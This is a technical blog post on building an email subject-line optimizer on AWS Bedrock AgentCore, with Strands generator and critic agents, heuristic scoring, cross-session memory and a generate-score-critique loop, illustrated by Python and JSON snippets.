&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj4ap50pr38rf8jh9iq9b.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj4ap50pr38rf8jh9iq9b.png" alt="From AWS Docs: https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/what-is-bedrock-agentcore.html" width="800" height="571"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;AgentCore, announced in 2025, was AWS's evolution of that pattern. Instead of a single "agent product," it broke the harness apart into composable services and made them framework-agnostic, so you could bring Strands, LangGraph, CrewAI or anything else. April 2026 added the managed Harness, which closed the loop: Harness offers the same easy, configuration-based approach as Bedrock Agents, but it runs on the AgentCore platform and lets you switch to code when you need more control.&lt;/p&gt;

&lt;p&gt;AWS continues to maintain both Bedrock Agents and AgentCore in parallel. Bedrock Agents remains available for teams that already use it or prefer a fully managed, configuration-only approach, while AgentCore is positioned as the path forward for new projects that need flexibility, framework choice or production-grade infrastructure.&lt;/p&gt;


&lt;h2&gt;
  
  
  The use case: briefing in, subject lines out
&lt;/h2&gt;

&lt;p&gt;Email subject lines have an outsized effect on open rates, and they're often the only impression a campaign makes. Marketers with the volume and time for A/B testing can ship two or more variants and let the data decide. Many don't, so they write a single subject line, second-guess it, and hit send.&lt;/p&gt;

&lt;p&gt;Imagine that you run email marketing for a specialty coffee brand. You open the optimizer, fill in the briefing and set a few constraints: nothing longer than 55 characters, no discount language, no emojis. You hit optimize and watch the rounds come in. Round one produces 8 candidates covering the full stylistic range, from urgency-led to curiosity-led to plain and direct. The scorer immediately tells you which ones carry spam risk, which ones are the right length, which ones align with a retention audience. The weakest three get dropped and the Critic explains why. Round two regenerates those slots with that guidance in mind. By round three the scores have converged and you have a ranked shortlist of five, each with a predicted open-rate band and a breakdown of what drove the score.&lt;/p&gt;

&lt;p&gt;Next week you run a cross-sell campaign for the same brand. The briefing is different but the session ID carries your name. Before generating a single candidate, the optimizer reads what it learned from your prior sessions: urgency-led lines consistently underperformed for this brand; premium and exclusivity framing reached the shortlist every time. Round one already looks different from what a first-time user would see.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6rsgbv313uyttm6srsnf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6rsgbv313uyttm6srsnf.png" alt=" " width="772" height="544"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  Input: a campaign briefing
&lt;/h3&gt;

&lt;p&gt;A generic JSON brief with the objective, audience, offer, brand voice and constraints. The kind of structure you'd find in any agency template, nothing platform-specific.&lt;/p&gt;
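&lt;p&gt;For illustration, the coffee-brand briefing from earlier might look something like this (field names are my own, not a fixed schema):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;{
  "objective": "drive repeat purchases",
  "audience": "retention segment, purchased in the last 90 days",
  "offer": "new single-origin line, no discount",
  "brand_voice": "warm, knowledgeable, specialty-coffee expert",
  "constraints": {
    "max_length_chars": 55,
    "no_discount_language": true,
    "no_emojis": true
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;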
&lt;h3&gt;
  
  
  Output: a ranked shortlist of 5
&lt;/h3&gt;

&lt;p&gt;Each variant comes with predicted open-rate range, the dimensions where it scored highest and any flagged risks (spam triggers, length penalty, audience mismatch). The user can ask for follow-ups in the same session — "give me shorter versions of #2 and #4" — and the agent refines while preserving what made those variants score well.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fapgqacprpqx7n821g8s2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fapgqacprpqx7n821g8s2.png" alt="UI mockup" width="800" height="492"&gt;&lt;/a&gt;&lt;/p&gt;


&lt;h2&gt;
  
  
  Drafting a solution
&lt;/h2&gt;

&lt;p&gt;Three tiers, top to bottom.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9ge20upo4kuaq76rg2i4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9ge20upo4kuaq76rg2i4.png" alt=" " width="800" height="612"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The caller sends a campaign briefing JSON and gets a streamed response back. That exchange happens through a single &lt;code&gt;@app.entrypoint&lt;/code&gt; function inside AgentCore Runtime, a managed AWS service that handles the HTTP transport, session lifecycle, and streaming framing so the agent code doesn't have to.&lt;/p&gt;

&lt;p&gt;Inside the Runtime, the architecture splits into two layers. The &lt;strong&gt;imperative shell&lt;/strong&gt; (&lt;code&gt;agent/builder.py&lt;/code&gt;) owns everything that touches a framework: two Strands agents (Generator and Critic), an in-process scorer, and a memory recall helper. It wires these into four plain Python callables and injects them into the &lt;strong&gt;functional core&lt;/strong&gt; (&lt;code&gt;agent/iteration.py&lt;/code&gt;). The core runs the generate/score/critique/regenerate loop and returns a ranked shortlist.&lt;/p&gt;

&lt;p&gt;At the bottom, two managed AWS services sit off the request path. Bedrock serves every LLM call via Strands' &lt;code&gt;BedrockModel&lt;/code&gt;. AgentCore Memory receives session events automatically from the Strands session manager, and returns extracted patterns when the loop asks for them at the start of each run. The async strategy extraction that makes cross-session learning possible runs roughly 60 seconds after each session ends.&lt;/p&gt;


&lt;h2&gt;
  
  
  I. The entrypoint (main.py)
&lt;/h2&gt;

&lt;p&gt;The entrypoint has one job: receive a campaign briefing, run the optimization loop and stream results back as they arrive.&lt;/p&gt;

&lt;p&gt;AgentCore Runtime gives you this as a single decorator. You don't write a router, configure middleware or manage a server process; instead, you hand it an async generator and it handles the rest: HTTP transport, session lifecycle, streaming framing, &lt;code&gt;session_id&lt;/code&gt; and &lt;code&gt;user_id&lt;/code&gt; extraction from request headers.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;app&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;BedrockAgentCoreApp&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="nd"&gt;@app.entrypoint&lt;/span&gt;
&lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;invoke&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;session_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;getattr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;session_id&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="ow"&gt;or&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;default-session&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
    &lt;span class="n"&gt;user_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;getattr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;user_id&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="ow"&gt;or&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;default-user&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;briefing&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;validate_briefing&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;prompt&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="ow"&gt;or&lt;/span&gt; &lt;span class="sh"&gt;""&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nf"&gt;except &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;ValueError&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;JSONDecodeError&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;exc&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;yield&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Invalid briefing: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;exc&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt;

    &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;run_initial_optimization&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;briefing&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;session_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;round_log&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;rounds&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;line&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;_format_round_lines&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;round_log&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="k"&gt;yield&lt;/span&gt; &lt;span class="n"&gt;line&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
    &lt;span class="k"&gt;yield&lt;/span&gt; &lt;span class="nf"&gt;_format_shortlist&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
    &lt;span class="k"&gt;yield&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;dumps&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;_serialize_result&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;ensure_ascii&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="bp"&gt;False&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Every &lt;code&gt;yield&lt;/code&gt; sends a chunk to the caller immediately. This matters because an optimization run takes 30 to 90 seconds, and the caller sees each round's scores as they complete rather than a blank screen followed by a wall of text.&lt;/p&gt;

&lt;p&gt;Refinement works by re-submitting a modified briefing with the same &lt;code&gt;session_id&lt;/code&gt; — with, for example, a tighter length constraint, different brand voice or added avoid-words. AgentCore Memory carries learned patterns from prior sessions forward automatically; the entrypoint doesn't need to know about that.&lt;/p&gt;
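&lt;p&gt;In practice a refinement request is just the previous briefing with a few edited fields, re-sent under the same session. A sketch with hypothetical field names:&lt;/p&gt;

```python
import copy
import json

previous = {
    "objective": "spring cross-sell",
    "constraints": {"max_length": 55, "no_emojis": True},
}

# Tighten the length constraint and add avoid-words; everything else is
# carried over, and reusing the same session_id ties the runs together.
refined = copy.deepcopy(previous)
refined["constraints"]["max_length"] = 45
refined["constraints"]["avoid_words"] = ["sale", "discount"]

payload = {"prompt": json.dumps(refined)}
```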




&lt;h2&gt;
  
  
  II. The imperative shell (agent/builder.py)
&lt;/h2&gt;

&lt;p&gt;The shell is the wiring layer. It knows about Strands, AgentCore and Bedrock; the functional core doesn't, because the shell turns those framework dependencies into plain Python callables the core can invoke without importing anything.&lt;/p&gt;

&lt;p&gt;Four things live here: a generator agent, a critic agent, an in-process scorer and a memory recall helper. At the start of each optimization run, all four get injected into the loop as callables.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;run_initial_optimization&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;briefing&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;session_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;generator&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;_make_agent&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;session_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;GENERATOR_SYSTEM_PROMPT&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;critic&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;_make_agent&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;session_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;CRITIQUE_SYSTEM_PROMPT&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;generate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prompt&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;_n&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;_strip_json_array&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;generator&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prompt&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;critique&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;scored&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;to_drop&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;critic&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;build_critique_prompt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;scored&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;to_drop&lt;/span&gt;&lt;span class="p"&gt;))).&lt;/span&gt;&lt;span class="nf"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;run_optimization&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
        &lt;span class="n"&gt;briefing&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;generate&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;generate&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;score&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;score_candidates&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;critique&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;critique&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;recall&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;recall_for_user&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;on_round&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;_emit_round_telemetry&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;actor_id&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;round_one_prompt_builder&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;round_one_prompt&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;regenerate_prompt_builder&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;regenerate_prompt&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  The agents
&lt;/h3&gt;

&lt;p&gt;Generator and Critic are separate Strands &lt;code&gt;Agent&lt;/code&gt; instances with separate system prompts. The generator is told to produce strict JSON arrays of strings and nothing else. The critic is told to produce two to four sentences of explicit, actionable guidance.&lt;/p&gt;

&lt;p&gt;Both share the same &lt;code&gt;AgentCoreMemorySessionManager&lt;/code&gt;, so they write to the same session namespace and see the same conversation history.&lt;/p&gt;

&lt;h3&gt;
  
  
  Scoring stays in-process
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;score_candidates&lt;/code&gt; is not an agent and not a service call — it's a direct import of &lt;code&gt;score_subject_line&lt;/code&gt; from &lt;code&gt;scoring/score.py&lt;/code&gt;, with the heuristic rules loaded once. No network, no latency, no failure mode beyond a bad CSV row.&lt;/p&gt;

&lt;h3&gt;
  
  
  The observability hook
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;on_round=_emit_round_telemetry&lt;/code&gt; is the last injection. After each completed round, the loop calls it with a &lt;code&gt;RoundLog&lt;/code&gt;. The shell opens an OpenTelemetry span, records the round's key attributes (round number, candidate count, top score, top subject line, guidance excerpt), closes the span and emits a structured log line.&lt;/p&gt;




&lt;h2&gt;
  
  
  III. The functional core (agent/iteration.py)
&lt;/h2&gt;

&lt;p&gt;Keeping the loop free of framework imports means it can be read, tested and reasoned about without knowing anything about the surrounding infrastructure. You can swap the LLM, replace the scoring backend or drop AgentCore entirely and the loop doesn't change. The entire contract is in the signature:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;run_optimization&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;briefing&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Any&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;generate&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Callable&lt;/span&gt;&lt;span class="p"&gt;[[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;]],&lt;/span&gt;
    &lt;span class="n"&gt;score&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Callable&lt;/span&gt;&lt;span class="p"&gt;[[&lt;/span&gt;&lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;Any&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;dict&lt;/span&gt;&lt;span class="p"&gt;]],&lt;/span&gt;
    &lt;span class="n"&gt;critique&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Callable&lt;/span&gt;&lt;span class="p"&gt;[[&lt;/span&gt;&lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;dict&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;dict&lt;/span&gt;&lt;span class="p"&gt;]],&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="n"&gt;recall&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Callable&lt;/span&gt;&lt;span class="p"&gt;[[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Any&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;MemoryContext&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;on_round&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Callable&lt;/span&gt;&lt;span class="p"&gt;[[&lt;/span&gt;&lt;span class="n"&gt;RoundLog&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;actor_id&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;anonymous&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;max_rounds&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;plateau_epsilon&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;float&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mf"&gt;0.5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;round_one_prompt_builder&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;...,&lt;/span&gt;
    &lt;span class="n"&gt;regenerate_prompt_builder&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;...,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;IterationResult&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Round one generates eight candidates across eight archetypes and scores them all. Each subsequent round generates only the slots vacated by pruning. New and surviving candidates are merged, deduped by subject line and sorted by score.&lt;/p&gt;
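&lt;p&gt;The merge step above can be sketched as a pure function. This is a simplification; the real candidates carry full score breakdowns, not just a number:&lt;/p&gt;

```python
def merge_round(survivors: list[dict], fresh: list[dict]) -> list[dict]:
    """Merge surviving and newly generated candidates, dedupe by subject
    line (case-insensitive), keep the higher-scoring copy, sort best-first."""
    best: dict[str, dict] = {}
    for cand in survivors + fresh:
        key = cand["subject_line"].strip().lower()
        if key not in best or cand["score"] > best[key]["score"]:
            best[key] = cand
    return sorted(best.values(), key=lambda c: c["score"], reverse=True)
```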

&lt;p&gt;After sorting, the loop checks whether the top-3 average improved by at least &lt;code&gt;plateau_epsilon&lt;/code&gt; points over the prior round. If not, the scores have converged and the loop stops early to avoid wasting LLM calls.&lt;/p&gt;
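&lt;p&gt;The convergence check is simple arithmetic. A sketch under the same default of &lt;code&gt;plateau_epsilon = 0.5&lt;/code&gt;:&lt;/p&gt;

```python
def has_plateaued(prev_scores: list[float], curr_scores: list[float],
                  plateau_epsilon: float = 0.5) -> bool:
    """True when the average of the top-3 scores improved by less than
    plateau_epsilon points since the previous round."""
    def top3_avg(scores: list[float]) -> float:
        top = sorted(scores, reverse=True)[:3]
        return sum(top) / len(top)
    return top3_avg(curr_scores) - top3_avg(prev_scores) < plateau_epsilon
```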

